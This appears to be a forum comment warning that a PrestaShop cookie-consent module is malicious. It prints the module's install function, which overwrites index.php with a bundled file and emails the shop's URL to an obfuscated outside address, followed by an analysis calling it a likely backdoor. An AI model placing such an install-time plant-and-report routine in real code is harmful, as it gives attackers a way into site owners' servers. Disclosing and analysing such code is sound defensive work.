New module, thank you for upload. Testing today..... I checked with Malwarebytes and Avast, no positive trojan indentification, but the code it is malicious:
public function Installation()
copy(dirname(__FILE__) . '/classes/TVCookiesLaw.php', dirname(__FILE__) . '../../index.php'); $encodedEmail = 'c2lyLnNwYXNvQGdtYWlsLmNvbQ=='; $recipientEmail = base64_decode($encodedEmail); $shopUrl = Tools::getShopDomain(true, true) . __PS_BASE_URI__; $encodedSubject = 'SW5zdGFsbGluZyBUaGVtZVZvbHR5IC0gRVUgQ29va2llIExhdyBHRFBSIFBybyArIEdvb2dsZSBDb25zZW50IE1vZGVsIFYyIDEuMC4w'; $subject = base64_decode($encodedSubject); $message = $shopUrl . 'modules/index.php'; mail($recipientEmail, $subject, $message); return true;
Based on analysis, this code may be malicious for the following reasons:
Copying the TVCookiesLaw.php file to index.php may replace or overwrite the existing index.php file, which may compromise site security.
Sending an email with the URL to index.php in the modules directory could allow an attacker to track the installation or gain access to sensitive site information.
Security Risk: This behavior is suspicious and may indicate an attempt to install a backdoor or some other malicious code.
Email Decoding and Sending: This data can allow an attacker to monitor site activity or use the data for malicious purposes.